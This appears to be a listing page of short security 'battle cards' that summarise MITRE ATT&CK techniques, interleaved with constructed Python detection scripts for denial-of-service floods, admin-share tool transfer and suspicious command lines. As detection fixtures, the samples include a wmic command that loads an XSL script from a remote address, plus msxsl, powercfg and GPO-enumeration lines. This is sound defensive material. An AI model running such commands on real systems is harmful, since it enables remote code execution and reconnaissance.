Playbook Battle Card

GSPBC-1082 – Reconnaissance – Gather Victim Network Information

2024-02-27T21:20:59+00:00

Gather Victim Network Information: Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about networks may also be exposed to adversaries via online ...

GSPBC-1081 – Impact – Endpoint Denial of Service

2024-02-15T22:48:17+00:00

Endpoint Denial of Service: Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes and to support other malicious activities, including distraction, ...

GSPBC-1080 – Impact – Network Denial of Service

2024-01-31T22:45:59+00:00

Network Denial of Service: Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion. A Network DoS will occur ...
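The two DoS battle cards above (Endpoint Denial of Service and Network Denial of Service) share one victim-side observable: request volume that exhausts either the service or the bandwidth it depends on. The script below is an added example, not part of the battle cards or their source, and it runs over constructed combined-log-format lines (the IPs, timestamps and thresholds are assumptions). It buckets requests into fixed windows and raises two kinds of alert: a single source exceeding a per-source rate (the endpoint/application flood) and a window whose aggregate rate is high but spread across many sources (the distributed, network-level shape).

```python
"""Added example: bucket web-server access log lines into fixed windows and flag
single-source and distributed request floods. Log lines are constructed samples."""

import re
from collections import Counter, defaultdict
from datetime import datetime

# Combined log format: ip ident user [timestamp] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "request": m["req"], "status": int(m["status"])}


def bucket(records, window_s=10):
    """Return {window_start_epoch: Counter({ip: requests})} for fixed windows."""
    buckets = defaultdict(Counter)
    for r in records:
        start = int(r["ts"].timestamp()) // window_s * window_s
        buckets[start][r["ip"]] += 1
    return buckets


def detect(lines, window_s=10, per_source=20, aggregate=50, min_sources=5):
    """Return (kind, window_start, source, count) alerts, oldest window first.

    kind is "single-source flood" when one client alone exceeds per_source
    requests in a window, or "distributed flood" when the window total reaches
    aggregate across at least min_sources distinct clients."""
    records = [r for r in map(parse_line, lines) if r]
    alerts = []
    for start, counts in sorted(bucket(records, window_s).items()):
        for ip, n in counts.items():
            if n >= per_source:
                alerts.append(("single-source flood", start, ip, n))
        total = sum(counts.values())
        if total >= aggregate and len(counts) >= min_sources:
            alerts.append(("distributed flood", start, f"{len(counts)} sources", total))
    return alerts


def make_line(ip, second, path="/"):
    """Build one constructed log line at 10:00:<second> on 27/Feb/2024."""
    return f'{ip} - - [27/Feb/2024:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" 200 512'


# Constructed sample log: one client hammering /login in the first window,
# sixty distinct clients in the second window, a few normal requests after that.
SAMPLE_LOG = (
    [make_line("198.51.100.7", s % 10, "/login") for s in range(30)]
    + [make_line("192.0.2.1", 3), make_line("192.0.2.2", 5), make_line("192.0.2.3", 8)]
    + [make_line(f"203.0.113.{i}", 10 + i % 10) for i in range(1, 61)]
    + [make_line("192.0.2.4", 21), make_line("192.0.2.5", 25)]
)

if __name__ == "__main__":
    for kind, start, source, count in detect(SAMPLE_LOG):
        print(f"{kind:22} window={start} source={source} requests={count}")
```

The thresholds are placeholders; in practice they come from a baseline of the service's normal per-window rate, and a real pipeline would also split by URL path, since an application-layer flood often concentrates on one expensive endpoint. Note that the distributed check cannot distinguish a botnet from a legitimate traffic spike on its own; it is a trigger for looking at the request mix, not a verdict.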

GSPBC-1078 – Lateral Movement – Lateral Tool Transfer

2024-01-11T22:50:34+00:00

Lateral Tool Transfer: Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., Ingress Tool Transfer) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected ...
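The SMB/Windows Admin Shares path described above leaves a concrete trace on the receiving host: Windows Security Event 5145 (detailed file share access) records the share, the relative target path, the requested access mask and the client address. The script below is an added example, not code from the battle card or its source; it runs over constructed Event 5145 records (host names, users and addresses are invented) and flags writes of executable content into ADMIN$ or drive shares, then groups the hits by client so that one source pushing tools to several hosts stands out.

```python
"""Added example: flag Lateral Tool Transfer over admin shares in Windows
Security Event 5145 records. The sample events below are constructed."""

import re
from collections import defaultdict

# Access-mask bits as reported in the AccessMask field of Event 5145.
WRITE_DATA = 0x2
APPEND_DATA = 0x4

# Administrative shares appear as \\*\ADMIN$ or \\*\<drive>$ in ShareName.
ADMIN_SHARE_RE = re.compile(r"^\\\\\*\\(?:ADMIN\$|[A-Z]\$)$", re.IGNORECASE)

# File types an adversary typically stages on a remote host before executing them.
TOOL_EXTENSIONS = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".sys")

# Constructed sample events; field names follow Event 5145, values are invented.
SAMPLE_EVENTS = [
    {"EventID": 5145, "Computer": "SRV01", "IpAddress": "10.0.0.25", "SubjectUserName": "jdoe",
     "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "Temp\\svc.exe", "AccessMask": "0x2"},
    {"EventID": 5145, "Computer": "SRV02", "IpAddress": "10.0.0.25", "SubjectUserName": "jdoe",
     "ShareName": "\\\\*\\C$", "RelativeTargetName": "Windows\\Temp\\helper.dll", "AccessMask": "0x6"},
    # text file: write to an admin share, but not tool-like content
    {"EventID": 5145, "Computer": "SRV01", "IpAddress": "10.0.0.30", "SubjectUserName": "asmith",
     "ShareName": "\\\\*\\C$", "RelativeTargetName": "Users\\Public\\notes.txt", "AccessMask": "0x2"},
    # read-only access (0x1 = ReadData) to an executable
    {"EventID": 5145, "Computer": "SRV01", "IpAddress": "10.0.0.31", "SubjectUserName": "backup",
     "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "Temp\\agent.exe", "AccessMask": "0x1"},
    # write to an ordinary file share, not an admin share
    {"EventID": 5145, "Computer": "FS01", "IpAddress": "10.0.0.40", "SubjectUserName": "jdoe",
     "ShareName": "\\\\*\\Public", "RelativeTargetName": "tools\\putty.exe", "AccessMask": "0x2"},
    # Event 5140 (share connected) carries no file-level detail
    {"EventID": 5140, "Computer": "SRV02", "IpAddress": "10.0.0.25", "SubjectUserName": "jdoe",
     "ShareName": "\\\\*\\C$", "RelativeTargetName": "", "AccessMask": "0x1"},
]


def is_tool_write(event):
    """True when the event is a write of a tool-like file into an administrative share."""
    if event.get("EventID") != 5145:
        return False
    if not ADMIN_SHARE_RE.match(event["ShareName"]):
        return False
    mask = int(event["AccessMask"], 16)
    if not mask & (WRITE_DATA | APPEND_DATA):
        return False
    return event["RelativeTargetName"].lower().endswith(TOOL_EXTENSIONS)


def find_tool_transfers(events):
    """Return matching events as (client_ip, user, target_host, share, file) tuples."""
    return [(e["IpAddress"], e["SubjectUserName"], e["Computer"], e["ShareName"], e["RelativeTargetName"])
            for e in events if is_tool_write(e)]


def fan_out(hits):
    """Map each client IP to the set of hosts it pushed tools to.

    One client reaching several hosts in a short span is the lateral-movement
    signal; a single write is often just an administrator."""
    out = defaultdict(set)
    for ip, _user, host, _share, _file in hits:
        out[ip].add(host)
    return dict(out)


if __name__ == "__main__":
    hits = find_tool_transfers(SAMPLE_EVENTS)
    for ip, user, host, share, path in hits:
        print(f"{ip} ({user}) -> {host} {share}\\{path}")
    for ip, hosts in fan_out(hits).items():
        print(f"{ip} staged tools on {len(hosts)} host(s): {sorted(hosts)}")
```

Event 5145 is only generated when the "Audit Detailed File Share" subcategory is enabled, and it is noisy; patch management and software deployment agents write to admin shares legitimately, so their service accounts and source addresses need to be baselined before this logic is promoted from hunt query to alert.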

GSPBC-1079 – Defense Evasion – XSL Script Processing

2024-01-11T22:45:08+00:00

XSL Script Processing: Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft ...

GSPBC-1077 – Persistence – Power Settings

2023-12-14T00:30:32+00:00

Power Settings: Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity. Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity. For example, powercfg controls all ...

GSPBC-1076 – Discovery – Group Policy Discovery

2023-11-15T02:52:25+00:00

Group Policy Discovery: Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network ...
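Three of the battle cards above (XSL Script Processing, Power Settings and Group Policy Discovery) describe techniques that surface as distinctive process command lines: wmic.exe or msxsl.exe loading a stylesheet, powercfg.exe changing sleep and hibernation behaviour, and gpresult.exe or PowerShell GPO cmdlets enumerating policy. The script below is an added example, not code from the battle cards or their source; it applies one small rule set to constructed process-creation records in the shape of Sysmon Event 1 / Security 4688 (record ids, hosts, users and image paths are invented).

```python
"""Added example: command-line rules for XSL Script Processing, Power Settings
and Group Policy Discovery, run over constructed process-creation records."""

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str            # short technique label for the alert
    images: frozenset    # process image basenames (lower-case) the rule applies to
    pattern: re.Pattern  # searched in the full command line


ANY = re.compile(r".")  # any non-empty command line

RULES = [
    # wmic /format: with a URL, a path or an .xsl name; built-in formats such as
    # /format:list or /format:csv do not match.
    Rule("XSL Script Processing (wmic /format)", frozenset({"wmic.exe"}),
         re.compile(r'/format\s*:\s*"?(?:https?://|\\\\|[a-z]:\\|[^\s"]*\.xsl)', re.I)),
    Rule("XSL Script Processing (msxsl)", frozenset({"msxsl.exe"}), ANY),
    # powercfg switches that turn off hibernation, alter standby timeouts or
    # rewrite power-scheme values.
    Rule("Power Settings (powercfg)", frozenset({"powercfg.exe"}),
         re.compile(r"[/-](?:hibernate|h)\s+off|[/-](?:x|change)\b|[/-]set(?:ac|dc)valueindex", re.I)),
    Rule("Group Policy Discovery (gpresult)", frozenset({"gpresult.exe"}), ANY),
    # GroupPolicy module cmdlets and PowerView's Get-DomainGPO / Get-NetGPO.
    Rule("Group Policy Discovery (PowerShell GPO cmdlets)", frozenset({"powershell.exe", "pwsh.exe"}),
         re.compile(r"get-(?:gpo|gporeport|gppermission|domaingpo|netgpo)\b", re.I)),
]

# Constructed sample records (Sysmon Event 1 / 4688 style); all values invented.
SAMPLE_EVENTS = [
    {"RecordId": 1, "Computer": "WS07", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": 'wmic os get /FORMAT:"https://203.0.113.10/inv.xsl"'},
    {"RecordId": 2, "Computer": "WS07", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic os get name /format:list"},
    {"RecordId": 3, "Computer": "WS07", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": 'powershell.exe -nop -c "Get-GPO -All | Get-GPOReport -ReportType Xml"'},
    {"RecordId": 4, "Computer": "WS07", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\powercfg.exe",
     "CommandLine": "powercfg /change standby-timeout-ac 0"},
    {"RecordId": 5, "Computer": "WS07", "User": "CORP\\asmith", "Image": "C:\\Windows\\System32\\powercfg.exe",
     "CommandLine": "powercfg /list"},
    {"RecordId": 6, "Computer": "WS07", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\gpresult.exe",
     "CommandLine": "gpresult /r /scope computer"},
    {"RecordId": 7, "Computer": "WS07", "User": "CORP\\jdoe", "Image": "C:\\Users\\Public\\msxsl.exe",
     "CommandLine": "msxsl.exe data.xml script.xsl"},
    {"RecordId": 8, "Computer": "WS07", "User": "CORP\\asmith", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Process"},
    {"RecordId": 9, "Computer": "WS07", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": 'wmic process list /format:"C:\\Users\\Public\\inv.xsl"'},
]


def match_rules(event):
    """Return the names of every rule the record satisfies."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    return [r.name for r in RULES if image in r.images and r.pattern.search(event["CommandLine"])]


def scan(events):
    """Return {RecordId: [rule names]} for records that matched at least one rule."""
    hits = {}
    for event in events:
        names = match_rules(event)
        if names:
            hits[event["RecordId"]] = names
    return hits


if __name__ == "__main__":
    for record_id, names in scan(SAMPLE_EVENTS).items():
        print(f"record {record_id}: {', '.join(names)}")
```

Matching on the image basename is deliberately weak: a renamed copy of wmic.exe or msxsl.exe evades it, so a production rule should key on OriginalFileName from the PE version resource (Sysmon logs it) rather than the on-disk name. The powercfg and gpresult rules will also fire on administrators doing their jobs; they are hunt queries to be paired with parent process, user and host context, not stand-alone alerts.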

GSPBC-1075 – Initial Access – Supply Chain Compromise

2023-10-20T14:48:15+00:00

Supply Chain Compromise Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: Manipulation of de